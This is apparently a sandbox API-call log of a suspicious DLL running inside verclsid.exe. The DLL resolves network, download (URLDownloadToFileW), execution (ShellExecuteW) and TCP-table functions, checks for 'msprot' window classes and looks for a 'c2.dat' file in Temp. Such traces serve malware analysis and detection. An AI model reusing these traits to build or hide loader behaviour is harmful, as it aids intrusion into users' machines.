[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1ea8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="htons") returned 0x7feffcd1250
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1ea8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="setsockopt") returned 0x7fef7311664
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1ea8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="WSAStartup") returned 0x7feffcd4980
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1ea8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="socket") returned 0x7feffcdde90
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1ea8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="WSACleanup") returned 0x7feffcd4cc0
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1ea8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="gethostbyname") returned 0x7feffcd8df0
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1ea8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="send") returned 0x7feffcd8000
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1ea8d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="connect") returned 0x7feffcd45c0
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1ea8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0550.541] GetProcAddress (hModule=0x7fef7310000, lpProcName="recv") returned 0x7fef7311744
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="gethostname") returned 0x7feffcdae20
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1ea8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="inet_ntoa") returned 0x7feffcdd9a0
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1ea8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="ntohs") returned 0x7feffcd1250
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1ea8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="WSAGetLastError") returned 0x7feffcd1290
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0550.542] GetProcAddress (hModule=0x7fef7310000, lpProcName="getpeername") returned 0x7feffcfe450
[0550.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0550.543] GetProcAddress (hModule=0x7fef7310000, lpProcName="getsockname") returned 0x7feffcd9480
[0550.543] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0550.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0550.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1ea8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0550.552] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="ShellExecuteW") returned 0x7fefe50983c
[0550.552] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7feffda0000
[0550.574] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0550.574] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1ea8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0550.574] GetProcAddress (hModule=0x7feffda0000, lpProcName="URLDownloadToFileW") returned 0x7feffe395e4
[0550.574] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0550.575] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7fefe210000
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1ea8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0550.575] GetProcAddress (hModule=0x7fefe210000, lpProcName="StrRetToStrW") returned 0x7fefe221078
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0550.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1ea8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0550.576] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe518660
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1ea8d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0550.576] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe57a274
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1ea8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0550.576] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHParseDisplayName") returned 0x7fefe574570
[0550.576] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7feff780000
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0550.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1ea8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0550.576] GetProcAddress (hModule=0x7feff780000, lpProcName="CoInitialize") returned 0x7feff79a51c
[0550.577] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb670000
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0550.584] GetProcAddress (hModule=0x7fefb670000, lpProcName="GetTcpTable") returned 0x7fefb6813ac
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0550.584] GetProcAddress (hModule=0x7fefb670000, lpProcName="SetTcpEntry") returned 0x7fefb682fb0
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1ea8d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0550.584] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCreateFile") returned 0x7fefb678250
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0550.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1ea8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0550.585] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCloseHandle") returned 0x7fefb677cc0
[0550.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0550.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1ea8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0550.585] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpSendEcho") returned 0x7fefb678340
[0550.585] DisableThreadLibraryCalls (hLibModule=0x2b0000) returned 1
[0550.585] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0550.585] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0x16cb20, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0550.586] DllGetClassObject (rclsid=0x387150*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7feff906cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x16e7f0)
[0550.586] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0550.587] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0550.587] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x16e3c6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0550.587] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0550.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1e7d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0550.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x16d2e0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0550.588] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x16e370 | out: lpFindFileData=0x16e370*(dwFileAttributes=0x386a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x386a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x16e390, dwReserved0=0x0, dwReserved1=0x16e3b8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0550.588] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16e036, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")) returned 0x20
[0550.589] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x16e046 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0550.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0550.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1e7da30, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0550.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x16cf60, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0550.589] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x16dff0 | out: lpFindFileData=0x16dff0*(dwFileAttributes=0x386a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x386a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x16e010, dwReserved0=0x0, dwReserved1=0x16e038, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0550.589] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0550.589] FindWindowW (lpClassName="msprot-clonB7", lpWindowName=0x0) returned 0x0
[0550.589] GetModuleFileNameW (in: hModule=0x2b0000, lpFilename=0x16e384, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")) returned 0x52
[0550.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="task+") returned 4
[0550.590] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll"), lpFindFileData=0x16dfe8 | out: lpFindFileData=0x16dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8f4eb60, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf8f4eb60, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf8f9ae20, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x35400, dwReserved0=0x0, dwReserved1=0x16e010, cFileName="B79266.DLL", cAlternateFileName="")) returned 0x3776f0
[0550.590] FileTimeToLocalFileTime (in: lpFileTime=0x16dfec, lpLocalFileTime=0x16e238 | out: lpLocalFileTime=0x16e238) returned 1
[0550.590] FileTimeToSystemTime (in: lpFileTime=0x16e238, lpSystemTime=0x16dfd8 | out: lpSystemTime=0x16dfd8) returned 1
[0550.591] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x16e58c, lpMaximumComponentLength=0x16e588, lpFileSystemFlags=0x16e584, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x16e58c*=0x8443a5af, lpMaximumComponentLength=0x16e588*=0xff, lpFileSystemFlags=0x16e584*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0550.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1117525688", cbMultiByte=10, lpWideCharStr=0x16cfc0, cchWideChar=2047 | out: lpWideCharStr="1117525688") returned 10
[0550.595] LoadLibraryW (lpLibFileName="SHFolder.dll") returned 0x7fefc970000
[0550.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0550.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x1e8c100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderPathW", lpUsedDefaultChar=0x0) returned 16
[0550.728] GetProcAddress (hModule=0x7fefc970000, lpProcName="SHGetFolderPathW") returned 0x7fefc9712c0
